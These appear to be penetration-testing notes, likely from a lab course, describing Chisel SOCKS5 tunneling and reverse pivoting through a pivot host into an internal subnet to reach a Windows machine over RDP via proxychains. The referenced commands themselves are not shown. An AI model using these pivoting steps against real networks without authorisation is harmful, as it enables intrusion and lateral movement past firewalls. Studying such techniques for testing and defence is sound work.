SOCKS5 Tunneling with Chisel
The Chisel tools both works over HTTP and SSH. The HTTP protocol is used to transport data while the SSH protocol is to secure the communications. Chisel binaries are both available for Linux and Windows. We can also build the binary on our own machine but this would require Go (Golang) installed. It can be used to create a TCP/UDP SOCKS tunnel between two different subnets. Chisel works with both a client and a server.
Note that the same version of Chisel is needed for both the client and server.
When to use?
Can ben an alternative when establishing an SSH session with the pivot host is not possible.
Downsides
Requires proxychains
Running the server on the pivot host
We transferred the Chisel binary on the pivot host using the scp
utility. The pivot host has two network interface and one is attached to the 172.16.5.0/23 network. The following command was used to start the Chisel server. The server listen on port 1234 for any connection and will forward the traffic to all network the pivot host is attached to using SOCKS 5.
On our attacker machine, we ran the Chisel client that connected to the Chisel server on port 1234.
As it can be seen below, a successful connection has been established between the Chisel server and the client. The Chisel client listening on port 1080 by default for any incoming connection.
Configuring proxychains
Now, we have to configure the /etc/proxychains.conf
file to forward all our localhost traffic to port 1080.
Now, that our tunnel and SOCKS proxy are configured. We can use the tunnel to RDP into a Windows system located in the 172.16.5.0./23 subnet.
Reverse Pivot
Chisel can also be used to configure a reverse tunnel from the pivot host to our attacker machine. Unlike the previous scenario, the server will run on our attacker box and the client will connect back to our Chisel server from the pivot. Reverse tunneling is handy when inbounds connections to the pivot host are blocked by firewalls.
Setting up the server
The following command starts the Chisel server on our attacker host. The port 1234
is listening for the Chisel client connection. Similarly to the previous scenario, the SOCKS proxy port used by default is 1080.
Connect the client
On the pivot server, we used the below command to connect the Chisel client to our Chisel server on port 1234.
Similarly to the previous scenario, we can configure our proxychains.conf file to set the listener on port 1080. We can then use proxychains and xfreerdp to establish a RDP session to the Windows target server located on the 172.16.5.0/23 network.
Last updated